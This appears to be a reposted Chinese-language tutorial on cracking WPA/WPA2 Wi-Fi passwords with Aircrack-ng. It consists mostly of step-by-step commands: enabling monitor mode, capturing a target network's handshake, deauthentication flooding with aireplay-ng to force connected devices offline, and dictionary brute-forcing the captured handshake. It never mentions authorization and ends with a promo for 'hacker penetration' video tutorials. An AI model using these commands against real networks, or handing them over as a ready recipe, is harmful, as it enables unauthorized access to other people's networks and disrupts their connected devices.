无线密码破解工具 - Aircrack-ng
版本說明:Aircrack-ng1.6
下載地址:*https://download.aircrack-ng.org/aircrack-ng-1.6.tar.gz*
使用環境:Linux/Windows(kali自帶)
工具說明:Aircrack-ng 是一款無線密碼破解工具
一、工具說明
Aircrack-ng是一個與802.11標準的無線網絡分析有關的安全軟件,主要功能有:網絡偵測,數據包嗅探,WEP和WPA/WPA2-PSK破解。
Aircrack-ng可以工作在任何支持監聽模式的無線網卡上并嗅探802.11a,802.11b,802.11g的數據。
該程序可運行在Linux和Windows上
如果在kali虛擬機里面破解無線密碼的話需要插入外置網卡設備,設備能監聽到數據即可,比如(RT3070),支持linux,免驅安裝
在物理機則不需要,但是安裝可能會比較麻煩,建議在kali里面弄
二、破解WPA/WPA2類WiFi操作
1、 查看可用的無線網卡
命令: airmon-ng
2、 將無線網卡以監聽模式啟動
命令:airmon-ng start wlan0
3、掃描周圍WiFi
命令: airodump-ng wlan0mon
BSSID——wifi的mac地址、PWR——信號強度(結果一般是按強度排序)、Data——監聽期間流量總合、CH——wifi所用信道、ENC——加密算法、ESSID——wifi名稱
看到自己要破解的wifi后直接按Ctrl+C終止命令即可。我們這里的目標是名為pentest的wifi,其BSSID為EE:45:6A:0D:32:7A,信道為1
2.4 開始抓取握手包并保存成文件
命令:airodump-ng -c 1 --bssid EE:45:6A:0D:32:7A -w /root/1/ wlan0mon
# -c指定信道,一定要是上一步查到的要破解的wifi所用信道 # -bssid指定bssid值,一定要是上一步查到的要破解的wifi的bssid # -w指定捕獲的握手到保存到的文件名2.5 強制對方WIFI斷開重連(獲取握手包)
在上一步中我們是被動等待,我們何時能抓取到握手包依賴于何時有設備與該wifi完成成功的認證。
但對于上一步這種有已連接設備的wifi,其實我們可以使用aireplay-ng進行deauth洪水攻擊使已連接他的設備掉線,掉線設備一般會自動重新連接wifi這樣我們就能輕松獲取握手包。
保持上步抓包命令不中斷,新打開一個窗口執行:
命令:aireplay-ng -0 2 -a EE:45:6A:0D:32:7A -c 34:29:12:60:14:3E wlan0mon
# -0表示通知設備斷開連接 # 2表示攻擊次數,小點大點都行吧 # -a指定仿造的wifi的mac地址(即bssid) # -c表示要讓認證失效的設備的mac地址,在上一步中可以看到如下圖所示,我們抓到了讓其重新認證的EE:45:6A:0D:32:7A的握手包。使用Ctrl+C終止抓包命令即可
此時會在指定的目錄產生以下四個文件(每執行一次抓包命令就會產生一組,所以抓包時要注意自己是第幾次執行的;不管也行下一步執定文件時使用*號通配符即可)
6、使用字典文件暴力破解密碼
aircrack-ng –a2 -b EE:45:6A:0D:32:7A -w common.txt ~/1/*.cap
# -a2 代表WPA的握手包 # -w指定要使用口令字典文件 # -b指定要目標wifi的mac地址(亦即bssid) # *.cap是抓取到握手包的數據包文件,*是通配符如果字典文件中存在wifi的密碼,那就能找到wifi的密碼,如果不包含那就找不到。(所以籠統地講wifi成功破解率依賴于字典大小)
7、 關閉網卡監聽模式【可選】
在第二步中我們使用airmon-ng將網卡以監聽模式啟動,最后我們將網卡還原回去
黑客滲透視頻教程,掃碼免費領
總結
以上是生活随笔為你收集整理的无线密码破解工具 - Aircrack-ng的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CAD室内设计构思怎么写?
- 下一篇: 机器学习之PAC学习框架